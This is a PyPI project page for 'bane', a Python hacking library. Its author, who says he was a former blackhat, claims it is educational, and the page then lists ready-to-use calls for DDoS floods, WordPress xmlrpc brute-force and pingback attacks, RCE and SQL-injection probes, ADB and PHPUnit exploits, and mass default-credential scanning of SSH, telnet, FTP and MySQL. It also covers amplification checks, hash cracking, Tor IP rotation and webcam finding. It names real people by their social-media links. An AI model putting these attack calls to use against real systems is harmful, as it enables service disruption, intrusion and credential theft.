Skip to main content

cyber security library

Project description

"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!" -Bane (Dark Knight)

                            .///` `.--::::::---.`` `///.                                    
                            h-.-s+++/--<br>.---/+o++s:.-h                                    
                            ++..-.                `:../s                                    
                         -+ydm-..:                :..-dmho:`                                
                      :odmNNNNs..-.              `:..+MNNNmmy/.                            `
                   .odmNNNNMMMN`..:              -..`mMMMMNNNNmy:                           
                  +mNNNNMMMMMMMo`.:`             :``/MMMMMMMMNNNmy.                         
                .yNNNNMMMMMMMMMd` `-<br>```````..-` `yMMMMMMMMMMNNNd:                        
               -dNNNMMMMMMMMMMMN`  ..-`      `-`-   mMMMMMMMMMMMMNNmo                       
              :mNNNMMMMMMMMMMMMM:   .         `.`  -MMMMMMMMMMMMMMNNNs`                     
             /mNNNMMMMMMMMMMMMMMy   ---      .--   oMMMMMMMMMMMMMMMNNNy`                    
            :mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy`                   
           -mNNNNMMMMMMMMMMMMMMMMo`.-`        `-.`+MMMMMMMMMMMMMMMMMNNNNo                   
           hNNNNNMMMMMMMMMMMMMMMMm.``-        .``.dMMMMMMMMMMMMMMMMMMNNNm-                  
          -NNNNNMMMMMMMMMMMMMMMMMM-..:        -<br>NMMMMMMMMMMMMMMMMMMNNNNs                  
          oNNNNNMMMMMMMMMMMMMMMMMMo``.`       -` +MMMMMMMMMMMMMMMMMMMNNNNm                  
         :dNNNNNNMMMMMMMMMMMMMMMMMd<br>-``````<br>.hMMMMMMMMMMMMMMMMMMMNNNNNs.                
       .ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:.  .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+`             `
     `oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-`    `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y:            `
     +y`  dNNNNNNMMMMMMMMMMMMMMMMMMy..-:-  --:..oMMMMMMMMMMMMMMMMMMMNNNNNN:  -N`            
     m-   hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN:   yo           `
    /d    yNNNNNMMh/-````````.-/ydNM.``-    -```NNds:.`..-----..-sNMMNNNNN-   -m`           
    h+    sNNNNNMMmsyhddmmmdhs:` `-o/../`  `/-.:+-` `:yhddmNNNNmmNMMMNNNNN.    d/           
    m/    oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-.  :o++//+yydMMMMMMMMNNNNN`   .so           
    d--   /NNNNNNMMMMMmyhm//   ymy.`-     o    `- odm:-  .ddssNMMMMMNNNNNm    /:s           
   .h /   :NNNNNNNMMMmhshhy+++ohy/. .:   `o`  `/``-shysssyddddNMMMMNNNNNNd   --.h 
   -y `:  .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy   / `d 
   :s  :`  dNNNNNMMMMMMMMMNNNmmNNh-    `.`  `.`  `+mMNNNNNMMMMMMMMMMNNNNN+  :`  m          `
   /o   /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .:   m          `
   ++   `:``dNNNMMMMMMMMMMMNo+/.`./-. o`  --`  o `-/.``/+omMMMMMMMMMMNNNo .:    d`         `
   -h    `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.:    -h          `
    s:    `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..:     y-           
    .h     `:`/hNMMMMMMd+: -::<br>s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.--    :y            
     o/   ` `:``:ymMNh:`-  /:-+`o::/`  +:/. +:+`  /::o./--+  /omMNdo- --  `   h.            
     `d` `+.` :.` -s:  -` ./:::`/::/   +-/. +-+`  :::/`-:::- `-`++.``-. `-+  :s             
      o+  /`-:``.-.   `-  /--/  /:-:   +-/. +-+   :-:+  /--/  .. `--. .:..:  h.             
      `d` :` +h+.     -  `+-:: .+-:+..-+://-+:+-../:-+-`-:-/.  -`   -yd. /  /s              
       o+ `:. -ydo.  -`  //::..o/-:o:.//:/++/:/+.:+/-/+: /::o   : :yd+``--  d.              
       `d   .:. -sy ..  .o--+ -.+-.`.-/<br>:/<br>/--`.-+.: +--o-  `/d+``--`:s               
        s/    .:` :.:```-o--o.-.:-` `:/   .:   /:` `-/ / s:-o-```+``.-`    h.               
        .h      -:`/.///`/..`:-.:`<br> <br><br><br>. <br>`: /--../ //:o.:.-y                
         s:       -o/::/:--.-.-.:                    : /`:.---/::+.       y-                
         `h.       ``/. `/ `  -.:```   <br><br>..`  ```: /  ` :` ./.     +o                 
          .y.         -.--    -.:.``- -```::```: ..`./ :    .-.-`       /s                  
           .y-                -.:```: :/::o+/::/ : ``: :              `+o                   
            `s+`     -..-     -.o/:/: `+::+//:+. -/::o`:     ..`-`   .s/                    
              :s-  ./-  `-    -.o//o.  /:::-::+  `o//o :    -`  ./.`+o.                     
               `/o:+..+`.`    -.://+<br>+--//:-+<br>////`:    `../-.ss-                       
                  /h  /` ..-`  .-o/+:..+--//:-+..-o/+:.` `-.- `+  y-                        
                   o+``.-+-.::<br>o//o- /--::--+ .o//s<br>:/.-//:``:s                         
                    -o:```.//:   :+::+.o--oo:-o.+::+/   :/o.```:o:                          
                      -o++oy.:    .- /`o::oo:-+-/ --    /o++++o:                            
                           `os      .. /..//../ ..`    `s:                                  
                            `o+.       `:`:-.-.     `.++-                                   
                              `/+/.`    `.  .`   `-++:`                                     
                                 `:+++/:-<br>-:+++/-                                         
                                      `.-::--`                                              
                                                                                           `

                                                  INTRODUCTION:

This python library is made for educationnal purposes only. Me, as the creator and developper, not responsible for any misuse for this module in any malicious activity. it is made as a tool to understand how hackers can create their tools and performe their attacks. it contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing
) and even more ;)


                                                  SPECIAL SPEECH:

this is dedicated to my mentor: Zachary Barker ( https://www.facebook.com/zachary.barker.5439 ), he was my leader and teacher through my journey in hacking world and groups, we have been through a lot together and were there in many operations when i was an active member in blackhat community but now he is dead in a hit-and-run :( . he was one of my true cyber bros:

-S0u1 ( https://www.facebook.com/S0u1.HLoTW ) : programmer and blackhat.
-Vince ( https://www.facebook.com/vincelinux ) : Linux and hardware expert, social engeneering and programmer.
-Zachary Barker (lulz zombie) : teams leader, anarkist, ops organizer, progammer, cyber security expert and blackhat.
-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.
-Jen Hill.
in the honor of all my bros and the memory of my bro zach im sharing all my personal hacking tools with public for the first time. plz use it wisely :)

now let's start some tutorials, shall we?


                                                  TUTORIALS:

I-INSTALLING THE LIBRARY AND IMPORTING:

you can use pip to do that ( if you are on linux you must run it with "sudo" ) :

pip install bane
or
pip3 install bane


or you can clone the project's link then run setup.py

git clone https://github.com/AlaBouali/bane

cd bane
python setup.py install


To use it, you have to open the python interpreter from your terminal/cmd (bane can be used only inside the interpreter only after importing it):

python
or
python3
then import it and start using it as in the tutorials below:
import bane

II-Usage (General usage):

DDoS:

UDP FLOOD:

bane.udp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001)

TCP FLOOD:

bane.tcp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500, timeout=5)

HTTP FLOOD:

bane.http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)

HTTP FLOOD using proxies (HTTP/SOCKS4/SOCKS5):

bane.prox_http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)

Torshammer attack:

bane.torshammer(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5)

Torshammer attack but through proxies instead of Tor:

bane.prox_hammer(IP, p= port , duration= 300 , threads=500 , timeout=5)

R.U.D.Y attack:

bane.rudy(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 , form="q" , page="/search.php")

Xerxes attack:

bane.xerxes(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 )

Xerxes attack through proxies:

bane.prox_xerxes(IP, p= port , duration= 300 , threads=500 , timeout=5 )

Slow read attack:

bane.slow_read(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )

WordPress testing:

Users list:

bane.wp_users(link , timeout=15 )

User's details:

bane.wp_user(link , user=1 , timeout=15 )

All xmlrpc's available functions:

bane.wp_xmlrpc_methods(link , timeout=15 )

Check if it's possible to performe BruteForce attack through xmlrpc:

bane.wp_xmlrpc_bruteforce(link , timeout=15 )

Check if it's possible to performe Mass BruteForce attack through xmlrpc:

bane.wp_xmlrpc_mass_bruteforce(link , timeout=15 )

Check a Login Combo:

bane.wpadmin(link , username , password , timeout=15 )

Check Multiple Login Combo at once:

bane.wpadmin_mass(link , word_list=["admin:123","admin:HGJJK","admin:HJKL","admin:%MLK"] , timeout=15 )

Check if it's possible to performe PingBack attack through xmlrpc:

bane.wp_xmlrpc_pingback(link , timeout=15 )

Performe PingBack attack through xmlrpc:

bane.wp_xmlrpc_pingback(link , target_url="https://www.example.com" , timeout=15 )

Check if it's possible to performe BruteForce attack through xmlrpc:

bane.wp_xmlrpc_bruteforce(link , timeout=15 )

Users Enumeration:

bane.wp_users_enumeration(link , timeout=15 )

WordPress version:

bane.wp_version(link , timeout=15 )

Vulnerable plugins and themes:

bane.wp_scan(link , timeout=15 )

Vulnerabilities TESTING:

Automatic XSS scan for page:

bane.xss(link , payload="<script>alert(123)</script>" , timeout=15 )

Remote Command Execution Linux Time-Based:

bane.rce(link ,injection={"command":"linux"},based_on='time', timeout=15 )

Remote Command Execution Linux File-Based:

bane.rce(link ,injection={"command":"linux"},based_on='file', timeout=15 )

Remote Command Execution Windows Time-Based:

bane.rce(link ,injection={"command":"windows"},based_on='time', timeout=15 )

Remote Command Execution Windows File-Based:

bane.rce(link ,injection={"command":"windows"},based_on='file', timeout=15 )

Remote Code Execution PHP Time-Based:

bane.rce(link ,injection={"code":"php"},based_on='time', timeout=15 )

Remote Code Execution PHP File-Based:

bane.rce(link ,injection={"code":"php"},based_on='file', timeout=15 )

Remote Code Execution PYTHON Time-Based:

bane.rce(link ,injection={"code":"python"},based_on='time', timeout=15 )

Remote Code Execution PYTHON File-Based:

bane.rce(link ,injection={"code":"python"},based_on='file', timeout=15 )

Remote Code Execution PERL Time-Based:

bane.rce(link ,injection={"code":"perl"},based_on='time', timeout=15 )

Remote Code Execution PERL File-Based:

bane.rce(link ,injection={"code":"perl"},based_on='file', timeout=15 )

Remote Code Execution RUBY Time-Based:

bane.rce(link ,injection={"code":"ruby"},based_on='time', timeout=15 )

Remote Code Execution RUBY File-Based:

bane.rce(link ,injection={"code":"ruby"},based_on='file', timeout=15 )

Remote Code Execution NODEJS Time-Based:

bane.rce(link ,injection={"code":"nodejs"},based_on='time', timeout=15 )

Remote Code Execution NODEJS File-Based:

bane.rce(link ,injection={"code":"nodejs"},based_on='file', timeout=15 )

SQL-Injection Time-Based:

bane.rce(link ,injection={"sql":"mysql"}, timeout=15 )#test for MySQL

SQL-Injection Time-Based:

bane.rce(link ,injection={"sql":"oracle"}, timeout=15 )#test for Oracle

SQL-Injection Time-Based:

bane.rce(link ,injection={"sql":"postgre"}, timeout=15 )#test for Postgre

SQL-Injection Time-Based:

bane.rce(link ,injection={"sql":"sql_server"}, timeout=15 )#test for SQL Server

File inclusion:

bane.file_inclusion(link, timeout=15 )

Clickjacking:

bane.clickjacking(link, timeout=15 )

HTTP Strict Transport Security (HSTS):

bane.hsts(link, timeout=15 )

CORS Misconfigurations:

bane.cors_misconfigurations(link, timeout=15 )

CSRF:

cookie="session=fgyujikop"#just an example of cookie sinceit requires a session

bane.csrf(link, timeout=15 , cookie=cookie )

Headers timeout:

bane.headers_timeout_test(IP , port=80, max_timeout=30 )

Slow GET test:

bane.slow_get_test(IP , port=80, duration=180 )

Maximum number of allowed connections from a single host:

bane.max_connections_limit(IP , port=80, connections=150 , duration=180 )

Slow POST test:

bane.slow_post_test(IP , port=80, duration=180 )

Slow Read test:

bane.slow_read_test(IP , port=80, duration=180 )

Android Debug Bridge (ADB) exploit:

bane.adb_exploit(IP , timeout=5 )

Exposed unauthenticated Telnet server:

bane.exposed_telnet(IP , timeout=5 )

Exposed "/.env" File:

bane.exposed_env(link , timeout=15 )

Vulners API Search for known vulnerabilities on a particular software:

bane.vulners_search("wordpress",version="4.7.4")#just an example

PHPUNIT exploit:

bane.phpunit_exploit(link , timeout=15 )

Shodan report:

api_key="ghbjklmjklmjlkml...."

bane.shodan_report(IP , api_key)

Proxies collecting:

Mass HTTP proxies gathering:

bane.masshttp()

Mass SOCKS4 proxies gathering:

bane.massocks4()

Mass SOCKS5 proxies gathering:

bane.massocks5()

Some HTTP proxies gathering:

bane.http()

Some HTTPS proxies gathering:

bane.https()

Some SOCKS4 proxies gathering:

bane.socks4()

Some SOCKS5 proxies gathering:

bane.socks5()

Checking proxy:

bane.proxy_check(IP , port , proto="http" , timeout=5)

IoTs mass scanning:

Mass ssh scanning: (if you are on Windows OS, please install Putty)

bane.mass_scan(threads=100 , protocol="ssh" , word_list= ["root:root","admin:admin"] )

Mass telnet scanning:

bane.mass_scan(threads=100 , protocol="telnet" , word_list= ["root:root","admin:admin"] )

Mass ftp scanning:

bane.mass_scan(threads=100 , protocol="ftp" , word_list= ["root:root","admin:admin"] )

Mass MySQL scanning:

bane.mass_scan(threads=100 , protocol="mysql" , word_list= ["root:root","admin:admin"] )

Mass Android Debug Bridge (ADB) exploit:

bane.mass_scan(threads=100 , protocol="adb" )

Extract information from page:

Parse all forms in the page:

bane.forms_parser(link , timeout=10 )

Get all page inputs and their values:

bane.inputs(link , value=True , timeout=10 )

Get all page forms and their values:

bane.forms(link , value=True , timeout=10 )

Get login form:

bane.loginform(link , value=True , timeout=10 )

Get all links on the page:

bane.crawl(link , timeout=10 )

Get all paths on the page:

bane.pather(link , timeout=10 )

Get all social media and external links on the page:

bane.media(link , timeout=10 )

Get all subdomains links on the page:

bane.subdomains_extract(link , timeout=10 )

Information gathering:

Get banner:

bane.get_banner(IP , p=port , payload=None , timeout=5 )

Get infomation about Domain or IP:

bane.info(IP , timeout=15 )

safeweb.norton.com report for a link:

bane.norton_rate(link , timeout=15 )

Your IP address:

bane.myip()

WHOIS:

bane.whois( domain )

GEO-Information for any IP:

bane.geoip( IP )

HTTP headers:

bane.headers( link )

Reverse IP Lookup:

bane.reverse_ip_lookup( IP )

Resolve any domain using a specific DNS server:

bane.resolve( domain , server="8.8.8.8" )

Very Fast port scan:

bane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 ).result

Subdomains finder:

bane.subdomains_finder( domain )

Encryption & Hashing:

XOR:

bane.xor_hash( data, key )

Caesar:

bane.caesar_hash( data, key )

MD5:

bane.md5_hash( data )

SHA1:

bane.sha1_hash( data )

SHA224:

bane.sha224_hash( data )

SHA256:

bane.sha256_hash( data )

SHA384:

bane.sha384_hash( data )

SHA512:

bane.sha512_hash( data )

Base64 encoding:

bane.base64_encode( data )

Base64 decoding:

bane.base64_decode( data )

File content encryption with XOR:

bane.xor_file( file , key )

File content encryption with MD5:

bane.md5_file( file )

File content encryption with SHA1:

bane.sha1_file( file )

File content encryption with SHA224:

bane.sha224_file( file )

File content encryption with SHA256:

bane.sha256_file( file )

File content encryption with SHA384:

bane.sha384_file( file )

File content encryption with SHA512:

bane.sha512_file( file )

File content encoding with base64:

bane.base64_encode_file( file )

File content decoding with base64:

bane.base64_decode_file( file )

Decryption:

MD5:

bane.decrypt(hash , word_list=["admin","admin123","love"] , md5_hash=True )

SHA1:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha1_hash=True )

SHA224:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha224_hash=True )

SHA256:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha256_hash=True )

SHA384:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha384_hash=True )

SHA512:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha512_hash=True )

Base64:

bane.decrypt(hash , word_list=["admin","admin123","love"] , base64_hash=True )

Caesar:

bane.decrypt(hash , word_list=["admin","admin123","love"] , caesar_hash=True )

Bruteforcing:

Admin login form on web page:

bane.web_login_bruteforce(link , word_list=["admin:admin","admin:1234"] , timeout=15 )

Bruteforce HTTP authentication login:

bane.http_auth_bruteforce(link , word_list=["admin:admin","admin:1234"] , timeout=15 )

FTP server:

bane.hydra(IP , protocol="ftp" , word_list=["admin:admin","admin:1234"] , timeout=5 )

SSH server: (if you are on windows, please install Putty)

bane.hydra(IP , p=22 , protocol="ssh" , word_list=["admin:admin","admin:1234"] , timeout=5 )

TELNET server:

bane.hydra(IP , p=23 , protocol="telnet" , word_list=["admin:admin","admin:1234"] , timeout=5 )

SMTP server:

bane.hydra(IP , p=25 , protocol="smtp" , ehlo=False , helo=True , ttls=False , word_list=["admin:admin","admin:1234"] , timeout=5)

MySQL server:

bane.hydra(IP , p=3306 , protocol="mysqlt" , word_list=["admin:admin","admin:1234"] , timeout=5 )

WordPress login page:

bane.hydra(link , protocol="wp" , word_list=["admin:admin","admin:1234"] , timeout=15 )

Admin panel finder:

bane.admin_panel_finder(link , ext="php" , timeout=15 )

Force browsing pages on admin panel:

bane.force_browsing(link , ext="php" , timeout=15 )

Filemanager finder:

bane.filemanager_finder(link , ext="php" , timeout=15 )

Amplification factors calculation for some protocols:

DNS:

bane.dns_factor( IP , timeout=3 )

NTP:

bane.ntp_factor( IP , timeout=3 )

Memcache:

bane.memcache_factor( IP , timeout=3 )

Chargen:

bane.chargen_factor( IP , timeout=3 )

SSDP:

bane.ssdp_factor( IP , timeout=3 )

SNMP:

bane.snmp_factor( IP , timeout=3 )

ECHO:

bane.echo_factor( IP , timeout=3 )

Tor IP switching:

Without password: (doesn't work with Windows OS)

bane.tor_switch_no_password( interval=30 , logs=True )

Without password: (doesn't work with Windows OS)

bane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)

Updating bane:

bane.update(version=None)

Some extra useful functions:

Clear a file:

bane.clear_file( file )

Create a file:

bane.create_file( file )

Delete a file:

bane.delete_file( file )

Get content of a file:

bane.read_file( file )

Get CloudFlare cookie: (you must install NodeJS first)

bane.get_cf_cookie( domain , user_agent )

Get HTB invitation:

bane.HTB_invitation()

Get Facebook account's ID:

bane.facebook_id( fb_link )

Google dorking:

bane.google_dorking( dork )

Webhint report's link:

bane.webhint_report( link )

Youtube search:

bane.youtube_search( query )

Write to a file:

bane.write_file( data , file )

Find webcams:

bane.webcams( count=10 , by={'country':'us'} )
bane.webcams( count=10 , by={'type':'axis'} )
bane.webcams( count=10 , by={'city':'paris'} )
bane.webcams( count=10 , by={'timezone':'+00:00'} )

Project details


Release history Release notifications | RSS feed

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

bane-4.7.2.tar.gz (162.6 kB view hashes)

Uploaded Source

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page